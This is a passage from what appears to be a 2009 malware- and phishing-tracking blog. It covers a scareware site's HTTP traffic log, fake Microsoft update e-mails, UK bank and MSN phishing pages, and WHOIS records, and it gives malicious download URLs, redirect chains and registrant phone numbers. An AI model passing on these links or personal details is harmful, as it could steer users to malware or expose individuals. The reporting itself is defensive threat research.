HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=112
ETag: "897e-77c-45c84872aa500"

------------------------------------------------------------------
GET /images/dvd.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897c-78e-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:16 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=114
ETag: "897c-78e-45c84872aa500"

------------------------------------------------------------------
GET /images/window1.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898d-32b3-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=111
ETag: "898d-32b3-45c848abe2c00"

------------------------------------------------------------------
GET /images/hrline.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897f-316-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=113
ETag: "897f-316-45c84872aa500"

------------------------------------------------------------------
GET /images/progressbar.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "8989-160-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=110
ETag: "8989-160-45c848abe2c00"

------------------------------------------------------------------
GET /images/i6000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8985-43e-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:17 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=112
ETag: "8985-43e-45c84872aa500"

------------------------------------------------------------------
GET /images/folder.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "897d-560-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:18 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=109
ETag: "897d-560-45c84872aa500"

------------------------------------------------------------------
GET /images/qicon.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898b-407-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:18 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=111
ETag: "898b-407-45c848abe2c00"

------------------------------------------------------------------
GET /images/progressbar_green.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:44:00 GMT
If-None-Match: "898a-c5-45c848abe2c00"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:19 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=108
ETag: "898a-c5-45c848abe2c00"

------------------------------------------------------------------
GET /images/i2000000.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8981-431-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:19 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=110
ETag: "8981-431-45c84872aa500"

------------------------------------------------------------------
GET /images/alert.gif HTTP/1.1
Accept: */*
Referer: http://tlupdate.info/index.php?affid=02909
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 25 Nov 2008 14:43:00 GMT
If-None-Match: "8978-3e0a-45c84872aa500"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: tlupdate.info
Connection: Keep-Alive

HTTP/1.1 304 Not Modified
Date: Wed, 12 Aug 2009 15:01:23 GMT
Server: Apache/2.2.11 (Unix) PHP/5.2.10
Connection: Keep-Alive
Keep-Alive: timeout=20, max=107
ETag: "8978-3e0a-45c84872aa500"

------------------------------------------------------------------


Which you've no doubt guessed, leads you to the usual scareware infection.


The actual infection itself, is loaded from tlupdate.info (IP: 89.149.210.147 - 89.149.210.147.internetserviceteam.com);

tlupdate.info/download.php?affid=02909

Which gives you a file called install.exe (563K - 206ca7574b8cf634f3b4add5e8d96e09)

http://www.virustotal.com/analisis/28204e54cdf4c7e495bf7ec93b261cffab4ac6b0243ead9d341611606b3a2368-1250087886

You'll no doubt have noticed Sunbelt's flagging it as Waledac, which means you're getting a whole host more than just scareware.

One of these days, NetDirekt will learn that the longer they're allowing this on their IP ranges, the longer it's going to take for those such as myself to stop blackholing all NetDirekt ranges I come across (including several I'm currently processing for addition as I write this (95.168.185.0-95.168.191.255).

/edit 13-08-2009 16:15

As of August 13th, the stromiko.com domain appears to have been deleted as it's no longer registered and thus, no longer active.

References:

hpHosts - Stromiko
http://hosts-file.net/?s=stromiko

hpHosts - Internet Service Team
http://hosts-file.net/pest.asp?show=internetserviceteam

hpHosts - 95.168.*
http://hosts-file.net/?s=95.168.&view=matches

Tuesday, 11 August 2009

Spam: Top two offenders

I thought I'd note the current top 2 offenders for spam and such, that have been attempting to abuse one of the sites I look after.

Neither will be of much surprise, given their location, but I recommend blackholing their entire ranges.

114.240.0.0 - 114.255.255.255 - belongs to UNICOM-BJ (China, AS4808)
82.144.196.0 - 82.144.219.255 - belongs to VOILA (Ukraine, AS25229)

Free domain with Office Live Small Business? Not anymore!

Microsoft offered a free domain name to those registering for their Office Live Small Business service, but come October, this is to change, with EVERYONE being charged around $15 (approx £7-8) for the domain name.

El Reg has more on this at;

http://www.theregister.co.uk/2009/08/10/office_live_domains_small_biz_charge/

Little tip folks, if you need a domain, don't get it as part of the hosting - get it seperately. Yep it will cost, but it'll be cheaper in the long run, and better for you, especially if you go with Domain Monster (just my opinion, YMMV, just don't get e-mail with DM as they annoyingly, charge £7 p/y for each e-mail account).

Sunday, 9 August 2009

Fake Microsoft e-mails: From RapidShare to orlandoula

It would seem, after rapidshare.com took down the malware that the king.cd links in those lovely fake e-mails, the bad guys decided enough was enough, and have now reverted back to using non-file hosting sites to distribute the malware.

Don't fret though, they're still using king.cd, so feel free to blackhole it.

The latest one I've received, which was received a couple mins ago, has the obligatory king.cd URL (king.cd/KuLk), which then leads you to;

hxxp://www.orlandoula.com/MicrosoftFramework.exe

VirusTotal results: http://www.virustotal.com/analisis/4d9412e7ab486f6fa3e64164e65dfa51ebeac1eb083d67c1587db2528befcb3e-1249879734

orlandoula.com currently lives at 67.219.36.164 (AS14242, LogicalSolutions.net). The domain was registered in 2007, so it's likely the site was hacked (though it does beg the question of why it's still got a "website coming shortly" message on it's homepage).

References:

Alert: Malicious Microsoft e-mail using king.cd and RapidShare
http://hphosts.blogspot.com/2009/08/alert-malicious-microsoft-e-mail-using.html

Friday, 7 August 2009

idealenterprises.net and SoftLayer in multiple bank phishing scams

Multiple banks customers are being targetted by a phishing scam hosted on SoftLayer's IP space (see left), with the domains themselves being registered to a chap in Pakistan (atleast it's not China this time I suppose).

The server itself is located at 174.37.54.20 (174.37.54.20-static.reverse.softlayer.com), which is the same IP that earlier this year, was found to be the host of malware.

The domains are both owned by the same chap, Hunain ahmed, which is apparently the owner of Ideal Enterprises. Research shows the domain was previously used for the company, so it's likely that the domains have simply been hacked, and their being owned by the same company is a coincidence, but I'm a skeptical bugger, so am not convinced.

manwarbros.com itself, was earlier today, found to be the host of a PayPal phishing scam according to PhishTank. The PayPal scam however, is now returning a 404.

You can see in the following screenshot (thanks to their leaving the directory open for browsing - woops), the banks being targetted.


As you can see from the screenshot, the banks targetted are;

1. Abbey National
2. Barclays
3. Cahoot
4. Halifax
5. HSBC
6. Lloyds TSB
7. Natwest
8. Royal Bank of Scotland
9. Smile
10. Yorkshire Bank

A check as of two seconds ago (was going to take some lovely screenshots for you), shows they're all now showing as offline (including the above directory listing), with idealenterprise.net's homepage being restored, but I've gotten a screenshot of one of them for you;



The page in the screenshot top right is still there, showing whilst they've cleaned up one of them, they've evidently missed the other.

Kudos to Shazza at the MyWot forums for the head up.

Thursday, 6 August 2009

Freeze.com/screensaver.com/shameful-pictures.com in MSN Phishing scam, with bonus malware!

My friend Tom sent me a couple links earlier, to URL's that were reported to contain worms.

girls.without.clothes.are.on.these.shameful-pictures.com (69.90.81.141 - my.stupid.isp.did.not.update.my.dns - QITX Inc. PEER1-QITX-51)

Not seeing anything other than references to freeze, and login requests in the source code, I created a new MSN account, and duly loaded the page in the browser to see if there was indeed a worm. Alas nope, not thus far.

This one, courtesy of shameful-pictures.com, presents you a lovely little login form, asking for your MSN login details, and yep, it obviously checks if they're valid or not as I tried several times using random and bogus data that it kept rejecting, before I gave up and created a dedicated MSN test account for it.

Needless to say, you aren't given any nude pictures, contrary to it's claim, nor however, was I able to find a worm - I did however, find malware from Freeze.com, which is the only other thing (aside from stealing MSN credentials) this thing seems to give. Once "logged in" (and I use that term very loosely here), you're presented with;

girls.without.clothes.are.on.these.shameful-pictures.com/pics.php


You've no doubt guessed, but I'm going to tell you anyway, that big "Click here to continue" button, leads you to off.freeze.com, but not before it's taken you on a little run-around;

START: 59.152.207.213/redir/?id=1c (IPC-NEWT - Hong Kong)

2. www.cpaclicks.com/secure.asp?e=cinksipisena&d=0&l=0&o=&p=0&subID1=&subID2=&subID3=&subID4=&subID5= (69.18.218.156 - Invision.com, Inc)

3. affiliates.copeac.com/ez/cinksipisena/&dp=0&l=0&p=0 (207.67.0.35 - intermarkmedia.wip.directresponsetech.com - Digital River, Inc. TWTC-DIGITALRIVER)

4. rdt.screensaver.com/?lgid=362&a=8305&f=2338|34103 (207.250.236.170 - ip170.freeze.com - GamePoint Inc. TWTC-GAMEP3)

END: lan.screensaver.com/LPQueue/885/index.asp?SessionId=444a7770-6aea-4935-a4c8-8086c356a5de&nat=0&cc=gb&cid=863170&lgid=362&a=8305&f=2338%7c34103 (87.248.211.177 - cds247.lon.llnw.net - Limelight Networks, LLNW-EU-2)

Or if you're using Opera, the URL it links you to, redirects you to;

register.freeze.com/Download/index.aspx?s=games&c=863168&SessionId=1679581c-2788-4b52-bc03-c2064fee86b0&fn=2334|34103 (207.250.236.107 - ip170.freeze.com - GamePoint Inc. TWTC-GAMEP3)

The other images, to the left and right of the "Click here to continue" button, are all located on MSN search results, so it's possible, if there was a worm, it came from one of those, but I couldn't find it.

Use a USB Key to Install Windows 7—Even on a Netbook

Putting the Windows 7 installation on a USB thumb drive has a few advantages—a small USB key is much more convenient for carrying around than a DVD, the OS will actually install much faster, and you can use a USB key to install Windows 7 on systems that do not have a DVD drive, such as a netbook. In fact, you can even install Windows 7 on netbooks that have fairly modest hardware. Dennis Chung, an IT Pro Evangelist at Microsoft recently posted a video demonstrating how easy it is to prepare your thumb drive and use it to install Windows 7. Here’s a quick look at the process:


Read more
http://technet.microsoft.com/en-gb/magazine/dd535816.aspx

Lies, Damned Lies, and SPYzooka

Lies, Damned Lies, and SPYzooka

A friend of mine from the respected Indian antivirus company Quick Heal Technologies recently brought two posts on the web to my attention.

http://www.articlesbase.com/security-articles/do-not-trust-quick-heal-antivirus-plus-2009-987981.html is an article written by someone who does not wish to disclose who they are. The article is pure fiction. Remember, articlebase.com does not validate content so I would assume everything there is wrong unless I independently verified the facts elsewhere.

The second link, and in my opinion the likely source of the fictitious article is http://bluepenguinsoftware.com/spyzooka/blog/removal-instructions-for-quickhealantivirusplus2009/

The author of the “blog”, Carl Haugen, claims:

“Like other rogues, it claims to be beneficial but in actuality it is malevolent. Instead of helping remove threats, it will download spyware, Trojan horse apps, adware, and other malware.”

I’m not a lawyer, but I have advised my friend that if Quick Heal chooses to sue BluePenguin Software for libel, I would be happy to testify on behalf of Quick Heal. It sure looks like a slam-dunk libel case to me.

It is possible that the folks at BluePenguin downloaded a pirated, cracked version of the program, but if they had downloaded the program from the developer’s web site they would have a legitimate antivirus product.

If you do your research on Quick Heal, you will find that they are tested by Virus Bulletin, have 27 VB 100 awards, 10 failures, and 28 no entries. Spyzooka does not participate in VB testing.

Quick Heal is certified by Westcoast labs Checkmark certification for both antivirus and spyware. Spyzooka is not certified.

Quick Heal is a corporate member of AVAR, the Association of Asia Antivirus Researchers, where I sit on the board of directors with my friend Sanjay Katkar of Quick Heal.


Read more
http://www.eset.com/threat-center/blog/2009/08/05/lies-damned-lies-and-spyzooka/

Note: Both BluePenguin and ArticlesBase have removed the articles, but they can still be found in the Google cache at;

bluepenguinsoftware.com/spyzooka/blog/removal-instructions-for-quickhealantivirusplus2009/
www.articlesbase.com/security-articles/do-not-trust-quick-heal-antivirus-plus-2009-987981.html
www.articlesbase.com/security-articles/quickhealantivirusplus2009-is-nothing-short-of-a-scam-987985.html
www.articlesbase.com/security-articles/quickhealantivirusplus2009-is-nothing-short-of-a-scam-987985.html

Alert: Malicious Microsoft e-mail using king.cd and RapidShare

I've just had the following drop in my inbox, and this is the first time I've seen a RapidShare URL NOT require you wait or enter a CAPTCHA to download the file - it just downloaded straight off the bat (saves me time analyzing it though ;o)).

hxxp://king.cd/OF4JTo7
>> hxxp://rs668tl.rapidshare.com/files/263883656/Microsoft_FrameworkUpgrade.exe

The headers show the e-mail was sent from 121.96.18.2 (121.96.18.2.bti.net.ph) which is on the BAYAN_ZION-AP (BayanTel Broadband) range, which you'll not be surprised to hear, is a residential broadband company.

With the file you're given, being a worm;

VirusTotal - Microsoft_FrameworkUpgrade.exe
http://www.virustotal.com/analisis/f26de7d6d5cd04927fd4b2f74019e9e68c0aa29df0b72e69ba304ca84f0883fe-1249507230

Tuesday, 4 August 2009

YAB (Yet Another Botnet) Microsoft exploit e-mails

We've got more of these fake Microsoft e-mails doing the rounds folks, and as with the Alliance and Leicester scams, these are all hosted on residential machines by the looks of it.

Unlike the Alliance and Leicester ones however, these have a nasty surprise waiting for you.

Should you realize your mistake before infecting yourself with the download they're offering, they've been kind enough to try and ensure you get *something*, which in this case, comes from fx-news.ru, and thankfully at the time of writing this, the exploit part of this, isn't working.


The URL that should be giving you the exploit, is currently serving a MySQL error message;

Can't connect to MySQL server on '91.207.116.22' (4)


91.207.116.22 is located on a Rushkranian block, apparently owned by Rise-v Ltd, which was also the source of the exploit at kervinly.com.

inetnum: 91.207.116.0 - 91.207.117.255
netname: EASTNET-UA-NET-2
descr: Rise-v Ltd
country: UA
org: ORG-RL28-RIPE
admin-c: LV1630-RIPE
tech-c: LV1630-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-END-MNT
mnt-lower: RIPE-NCC-END-MNT
mnt-by: MNT-NETART
mnt-routes: MNT-NETART
mnt-domains: MNT-NETART
source: RIPE # Filtered

organisation: ORG-RL28-RIPE
org-name: Rise-v, Ltd.
org-type: OTHER
descr: Rise-v, Ltd.
address: Traktorostroiteley str. 158, apt. 43
address: 61129, Kharkov, Ukraine
phone: +38 057 7616277
phone: +38 067 5791028
admin-c: LV1630-RIPE
tech-c: LV1630-RIPE
mnt-ref: EASTNET-MNT
mnt-by: EASTNET-MNT
source: RIPE # Filtered

person: Valera Lelin
address: 61129, Ukraine, Kharkov, Traktorostroiteley 158 str, apt. 43
phone: +380577507505
phone: +380639797654
remarks: ICQ: 4333444
remarks: agaaga
abuse-mailbox: abuse@rise.com.ua
nic-hdl: LV1630-RIPE
mnt-by: EASTNET-MNT
source: RIPE # Filtered

:: Information related to '91.207.116.0/23AS49536'

route: 91.207.116.0/23
descr: DENTAGLOBAL route
origin: AS49536
mnt-by: DENTA-MNT
source: RIPE # Filtered


URL's I've seen thus far;

http://update.microsoft.com.jiklaut.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=463335680057515548370716321207756784829866348428006905629
http://update.microsoft.com.ferrateu.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
http://update.microsoft.com.ferratet.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.nsatc.net/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.il1if1.com.mx/microsoftofficeupdate/isapdl/default.aspx?ln=en-us&id=10523941098791395374955537386571
update.microsoft.com.herrjuy.vu/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=286426523836840882450605409068671
update.microsoft.com.ferratep.net/microsoftofficeupdate/isapdl/default.aspx/?ln=en-us&id=286426523836840882450605409068671


Not all of these are still resolving.

Jaxryley over at Malwarebytes has saved me some time, by providing the VT results;

http://www.virustotal.com/analisis/508348da73073323a5baf3406eea1bcb687e0eb987ada8b1ce6b126f7d8bdab0-1249432378

With the Threat Expert results available at;

http://www.threatexpert.com/report.aspx?md5=d04b69dda52305d88e1bf7fe2b2a6034

For clarity, one of the e-mails I received, is shown below.



/edit 05-08-09 04:41

Added update.microsoft.com.ferratep.net